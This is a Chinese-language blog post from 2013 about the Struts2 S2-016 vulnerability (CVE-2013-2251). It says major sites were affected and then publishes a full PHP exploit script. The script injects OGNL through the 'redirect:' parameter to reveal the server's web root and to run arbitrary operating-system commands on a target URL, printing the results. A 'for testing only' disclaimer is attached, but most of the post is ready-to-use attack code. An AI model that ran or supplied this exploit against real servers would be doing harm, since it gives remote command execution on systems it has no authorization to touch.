昨天Struts漏洞大爆发,N多大站被爆出存在strtus2漏洞,百度,百合,京东等也在其中,本站也等一时间发布了strtus2漏洞的预警,具体文章请看
struts2最新s2-016代码执行漏洞 – CVE-2013-2251,当时小弟说了稍候公布利用EXP,现在就兑现承诺。
首先发一个GUI版的,是K8拉登哥哥写的,可以利用较老的struts2漏洞,如下图:
个人感觉拉登哥的用起来不是很方便,自己也折腾了一个,PHP版的,写的比较垃圾,代码也是参考了bstaint大牛的,当然也有部分改进的地方,比如中文代码等,为防乱用,未集成Getshell功能,可作为管理员测试网站安全性之用,勿用于非法用途。
<?php
/**
* Created BY 独自等待
* Date : 13-7-18
* Time : 上午10:42
* FileName : struts2_S2-016.php
* 欢迎访问独自等待博客www.waitalone.cn
*/
print_r('
+-----------------------------------------------------------------------+
Struts2_S2-016漏洞利用POC
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2013-07-18
+-----------------------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+-----------------------------------------------------------------------+
Useage: php ' . $argv[0] . ' URL CMD
URL: URL with Struts2 vulnerability
CMD: The command you want to run
Example: php ' . $argv[0] . ' http://waitalone.cn/safe.action "net user"
+-----------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
$url = $argv[1];
$cmd = $argv[2];
$path = '?redirect:${%23a%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23b%3d%23a.getRealPath("/"),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
echo '网站路径:' . @file_get_contents($url . $path) . "\n";
//执行命令函数
function command($url, $cmd)
{
$arr = explode(' ', $cmd);
foreach ($arr as $str) {
$exp .= '\'' . $str . '\',';
}
$exp = rtrim($exp, ',');
$url .= '?redirect:\${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{' . $exp . '})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(\'<!-struts2exp->\'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
$html = @file_get_contents($url);
$html = iconv('utf-8', 'gbk//IGNORE', $html);
$arr = explode('<!-struts2exp->', $html);
return trim($arr[1]) . "\n";
}
$result = command($url, $cmd);
echo $result;
?>
| |